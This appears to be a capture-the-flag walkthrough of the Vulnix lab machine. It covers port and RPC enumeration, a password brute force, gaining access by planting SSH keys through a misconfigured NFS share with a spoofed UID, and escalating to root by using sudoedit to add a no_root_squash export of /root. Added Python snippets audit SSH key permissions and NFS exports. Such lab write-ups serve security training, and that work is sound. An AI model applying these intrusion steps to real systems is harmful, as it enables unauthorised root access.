Vulnix

Target IP: 192.168.1.135
Kali IP: 192.168.1.128
Information gathering

sudo nmap --min-rate 10000 -p- 192.168.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 10:13 CST
Nmap scan report for bogon (192.168.1.135)
Host is up (0.0018s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
79/tcp    open  finger
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
35745/tcp open  unknown
44010/tcp open  unknown
50309/tcp open  unknown
55641/tcp open  unknown
59567/tcp open  unknown
sudo nmap -sT -sV -O -p- 192.168.1.135      

Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
79/tcp    open  finger     Linux fingerd
110/tcp   open  pop3?
111/tcp   open  rpcbind    2-4 (RPC #100000)
143/tcp   open  imap       Dovecot imapd
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell?
993/tcp   open  ssl/imap   Dovecot imapd
995/tcp   open  ssl/pop3s?
2049/tcp  open  nfs        2-4 (RPC #100003)
35745/tcp open  mountd     1-3 (RPC #100005)
44010/tcp open  nlockmgr   1-4 (RPC #100021)
50309/tcp open  mountd     1-3 (RPC #100005)
55641/tcp open  mountd     1-3 (RPC #100005)
59567/tcp open  status     1 (RPC #100024)
MAC Address: 00:0C:29:5E:A3:8D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
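Points of interest:


SMTP service (25)
Simple mail transfer service; it may depend on the POP3 (110) and IMAP (143) services, and may be open to weak-password brute forcing.
finger service (79)
Used to query information about the host or its users.
rpcbind service (111)
Remote procedure call: put simply, one node requests a service provided by another node. It can be enumerated.
rsh service
Linux remote login; it requires a password and may be open to brute forcing.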

rpcinfo -p 192.168.1.135
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  53781  status
    100024    1   tcp  59567  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049  nfs_acl
    100227    3   tcp   2049  nfs_acl
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049  nfs_acl
    100227    3   udp   2049  nfs_acl
    100021    1   udp  42327  nlockmgr
    100021    3   udp  42327  nlockmgr
    100021    4   udp  42327  nlockmgr
    100021    1   tcp  44010  nlockmgr
    100021    3   tcp  44010  nlockmgr
    100021    4   tcp  44010  nlockmgr
    100005    1   udp  38329  mountd
    100005    1   tcp  35745  mountd
    100005    2   udp  42275  mountd
    100005    2   tcp  55641  mountd
    100005    3   udp  45218  mountd
    100005    3   tcp  50309  mountd

NFS listens on port 2049 over both TCP and UDP.

showmount -e 192.168.1.135
Export list for 192.168.1.135:
/home/vulnix *

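The * means the share can be accessed from any host, so mount the share on the local machine.
Opening it reports insufficient permissions, so root_squash is probably set.
no_root_squash: if the user accessing the shared directory on the NFS host is root, that user has root privileges on the shared directory. This option is extremely insecure and is not recommended.
root_squash: if the user accessing the shared directory on the NFS host is root, that user's privileges are squashed to those of an anonymous user; usually its UID and GID become those of the nobody system account.
Enumerating SMTP users finds the root, user and vulnix accounts; hydra can only brute-force the password for user.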

ACCOUNT FOUND: [ssh] Host: 192.168.1.135 User: user Password: letmein [SUCCESS]
user:letmein
user@vulnix:~$ ls
user@vulnix:~$ whoami
user
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux

There was no data to exploit and I had no ideas.
I looked at a writeup; the approach is:

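  1. Mount the target's /home/vulnix directory over NFS at /tmp/vulnix on the local machine
  2. Switch to the vulnix user on Kali
  3. Copy the current user's SSH public key to the /tmp directory
  4. Copy the SSH public key into the authorized_keys file in the remote directory
  5. Log in to the target as the vulnix user over SSH without a password
  6. Then carry out privilege escalation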

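On Linux, every user has a unique user ID (UID). At SSH login, the server checks whether the UID of the connecting user matches the UID that owns the authorized_keys file; if they do not match, the SSH login fails. So the UID of the vulnix user on Kali must be the same as on the target.
Check the UID of the vulnix user: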

user@vulnix:~$ cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash

On Kali, create the user vulnix and set its password and UID.

useradd -m vulnix   
                                                                                                                                                       
passwd vulnix 
  
新的密码: 
重新输入新的密码: 
passwd:已成功更新密码

leafpad /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/bash

Note: -m creates the user's home directory
Mount
mount -t nfs 192.168.1.135:/home/vulnix /tmp/mount/
Switch user
su vulnix
$ bash
Generate a public/private key pair

ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): 
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2oDhnxJHWud5qTfFGW6m6w8pPEHo218RGPpYtkygZGs vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
|      o . .      |
|     o + o o     |
|    . E + = o    |
|   . O + O = +   |
|    = + S * O    |
|     + O + * .   |
|    . = B * .    |
|     .   = =     |
|         .+..    |
+----[SHA256]-----+

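Note: id_rsa is the private key and id_rsa.pub is the public key; the public key needs to be placed in the locally mounted directory.
cp ~/.ssh/id_rsa.pub /tmp/mount/.ssh/authorized_keys
or
cat ~/.ssh/id_rsa.pub >/tmp/mount/.ssh/authorized_keys
Connect over SSH
ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa vulnix@192.168.1.135 -v
Notes:
-i specifies the private key file;
Also, the latest Linux ssh does not support ssh-dss (reportedly because it is insecure, so changing this in the ssh config is not recommended), so the -o option is added temporarily.
Pay attention to the permissions on the key files (~/.ssh/id_rsa and /tmp/mount/.ssh/authorized_keys). (I changed them to 777 and could never log in; I was stuck for a day ╮(~ ̄▽ ̄)╭ )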
https://blog.csdn.net/u010694718/article/details/104804066#::text=%E9%A6%96%E5%85%88%E8%AE%BE%E7%BD%AE%2F.ssh%E7%9B%AE%E5%BD%95%E6%9D%83%E9%99%90%E4%B8%BA700%EF%BC%8C%E7%84%B6%E5%90%8E%E8%AE%BE%E7%BD%AEauthorized_keys%E6%9D%83%E9%99%90%E4%B8%BA600%E3%80%82%20cd%20%20chmod%20700%20%2F.ssh,cd%20~%2F.ssh%20chmod%20600%20authorized_keys%201
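
Why mode 777 blocks the login, as an added example (not from the original post and not OpenSSH's own code): with StrictModes enabled, which is the default, sshd ignores an authorized_keys file when the file or any directory between it and the home directory is group- or world-writable or owned by someone other than the user or root, and the ssh client refuses a private key that group or others can access. The function names are hypothetical and the check is a simplified approximation of that behaviour.

```python
import os
import stat


def strictmodes_problems(auth_keys, home, uid):
    """Approximate the owner/mode test sshd applies when StrictModes is on.

    Walks from the authorized_keys file up to the home directory and returns
    a list of (path, reason) for every component sshd would reject.
    """
    problems = []
    path = os.path.realpath(auth_keys)
    home = os.path.realpath(home)
    while True:
        st = os.stat(path)
        if st.st_uid not in (0, uid):
            problems.append((path, "owner uid %d is neither root nor %d"
                             % (st.st_uid, uid)))
        if st.st_mode & 0o022:  # group-writable or world-writable bit set
            problems.append((path, "mode %o is group/world writable"
                             % stat.S_IMODE(st.st_mode)))
        parent = os.path.dirname(path)
        if path == home or parent == path:  # stop at home (or at /)
            break
        path = parent
    return problems


def private_key_too_open(key_path):
    """True if group or others have any access: the ssh client skips the key."""
    return bool(os.stat(key_path).st_mode & 0o077)


if __name__ == "__main__":
    # Check the current user's own files when they exist.
    home = os.path.expanduser("~")
    keys = os.path.join(home, ".ssh", "authorized_keys")
    if os.path.exists(keys):
        for path, reason in strictmodes_problems(keys, home, os.getuid()):
            print(path, "->", reason)
```

Run against every home directory on a server, the same check also reports authorized_keys files that another account could rewrite.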

vlnix@vulnix:~$ whoami
vulnix

Switched successfully; start privilege escalation.

vulnix@vulnix:/$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit
    /etc/exports

Open /etc/exports and add /root *(rw,no_root_squash) to share the target's root directory over NFS.

vulnix@vulnix:/etc$ sudoedit /etc/exports 
sudoedit: /etc/exports unchanged
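
An audit of /etc/exports for the settings this walkthrough depends on (the wildcard client, no_root_squash, and a writable home directory whose client-supplied UIDs are trusted), as an added example that is not part of the original post. SAMPLE_EXPORTS is constructed, and the function names and finding labels are hypothetical.

```python
import re

# Constructed sample: the export implied by the showmount output above, the
# line this walkthrough adds with sudoedit, and one restricted export.
SAMPLE_EXPORTS = """\
/home/vulnix  *(rw,root_squash)
/root         *(rw,no_root_squash)
/srv/backup   192.168.1.0/24(ro,sync) \\
              10.0.0.5(rw,all_squash)
"""

ANY_HOST = {"", "*", "0.0.0.0/0", "::/0"}
CLIENT_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) per client entry of exports(5) text."""
    for line in re.sub(r"\\\n", " ", text).splitlines():  # join continuations
        line = line.split("#", 1)[0].strip()              # drop comments
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or [""]:        # no client listed means every host
            m = CLIENT_RE.match(spec)
            if m:
                opts = {o for o in (m.group(2) or "").split(",") if o}
                yield path, m.group(1), opts


def audit_exports(text):
    """Return sorted (path, client, finding) tuples for risky exports."""
    findings = set()
    for path, client, opts in parse_exports(text):
        shown = client or "<any>"
        rw = "rw" in opts                 # exports default to read-only
        if "no_root_squash" in opts:
            findings.add((path, shown, "NO_ROOT_SQUASH"))
        if client in ANY_HOST:
            findings.add((path, shown, "WORLD_RW" if rw else "WORLD_RO"))
        # root_squash only remaps UID 0; with the default sec=sys every other
        # client-supplied UID is trusted, so .ssh/authorized_keys is writable.
        in_home = path in ("/home", "/root") or path.startswith(("/home/", "/root/"))
        if rw and in_home and "all_squash" not in opts:
            findings.add((path, shown, "HOME_RW_UID_TRUSTED"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(*finding)
```

Because the sudoers rule shown above lets an unprivileged account edit this file as root, running the audit on every change to /etc/exports is what catches the added /root line.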

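Reboot the target so that it reads the NFS configuration file.
On Kali, create /tmp/v and mount the target's root directory at /tmp/v:
mount -t nfs 192.168.1.135:/root /tmp/v
Generate a new key pair, give the public key to the target, then connect over SSH.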

┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:84l0+6YMhIOFm2J9Bm46edZUOd0At8Caug1dx6YwaAs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .o.o      |
|     .  .= +     |
|    o..o+.o .    |
|  Eoo*=o..+      |
|  ooB+*+S+.      |
| . =+=.+.= o     |
|  + o+. o +      |
|   +. .  o ..    |
|          oo.    |
+----[SHA256]-----+
┌──(root㉿kali)-[~/.ssh]
└─# cp ~/.ssh/id_rsa.pub /tmp/v/.ssh/authorized_keys 
┌──(root㉿kali)-[/tmp/v/.ssh]
└─# ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa root@192.168.1.135 -v
root@vulnix:~# whoami
root
root@vulnix:~# uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation succeeded.
